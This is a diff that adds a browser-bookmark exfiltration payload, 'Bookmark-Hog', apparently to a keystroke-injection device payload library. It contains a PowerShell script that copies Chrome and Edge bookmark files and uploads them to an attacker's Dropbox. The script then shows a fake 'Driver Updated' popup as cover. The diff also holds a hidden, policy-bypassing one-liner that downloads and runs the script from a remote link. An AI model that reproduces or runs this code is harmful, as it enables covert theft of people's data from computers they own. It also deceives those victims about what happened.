diff --git a/payloads/library/exfiltration/Bookmark-Hog/BH.ps1 b/payloads/library/exfiltration/Bookmark-Hog/BH.ps1 new file mode 100644 index 0000000..5b8f1cd --- /dev/null +++ b/payloads/library/exfiltration/Bookmark-Hog/BH.ps1 @@ -0,0 +1,63 @@ +#Bookmark-Hog + +# See if file is a thing +Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf + +#If the file does not exist, write to host. +if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) { + try { + Write-Host "The chrome bookmark file has not been found. " + } + catch { + throw $_.Exception.Message + } + } + # Copy Chrome Bookmarks to Bash Bunny + else { + $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt" + Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" + } + +# See if file is a thing +Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf + +#If the file does not exist, write to host. +if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) { + try { + Write-Host "The edge bookmark file has not been found. " + } + catch { + throw $_.Exception.Message + } +} + # Copy Chrome Bookmarks to Bash Bunny + else { + $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt" + Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" +} + +function DropBox-Upload { + + [CmdletBinding()] + param ( + + [Parameter (Mandatory = $True, ValueFromPipeline = $True)] + [Alias("f")] + [string]$SourceFilePath + ) + $DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token + $outputFile = Split-Path $SourceFilePath -leaf + $TargetFilePath="/$outputFile" + $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' + $authorization = "Bearer " + $DropBoxAccessToken + $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" + $headers.Add("Authorization", $authorization) + $headers.Add("Dropbox-API-Arg", $arg) + $headers.Add("Content-Type", 'application/octet-stream') + Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers + } + +DropBox-Upload -f "$env:tmp/$F1" +DropBox-Upload -f "$env:tmp/$F2" + +$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) diff --git a/payloads/library/exfiltration/Bookmark-Hog/README.md b/payloads/library/exfiltration/Bookmark-Hog/README.md new file mode 100644 index 0000000..4e8ac03 --- /dev/null +++ b/payloads/library/exfiltration/Bookmark-Hog/README.md @@ -0,0 +1,109 @@ + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Bookmark-Hog + +A payload to exfiltrate bookmarks of the 2 most popular browsers + +## Description + +This payload will enumerate through the browser directories, looking for the file that stores the bookmark history +These files will be saved to the temp directory +Finally dropbox will be used to exfiltrate the files to cloud storage + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Bookmark-Hog/payload.txt b/payloads/library/exfiltration/Bookmark-Hog/payload.txt new file mode 100644 index 0000000..17ce970 --- /dev/null +++ b/payloads/library/exfiltration/Bookmark-Hog/payload.txt @@ -0,0 +1,16 @@ +REM Title: Bookmark-Hog + +REM Author: atomiczsec + +REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky + +REM Target: Windows 10, 11 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1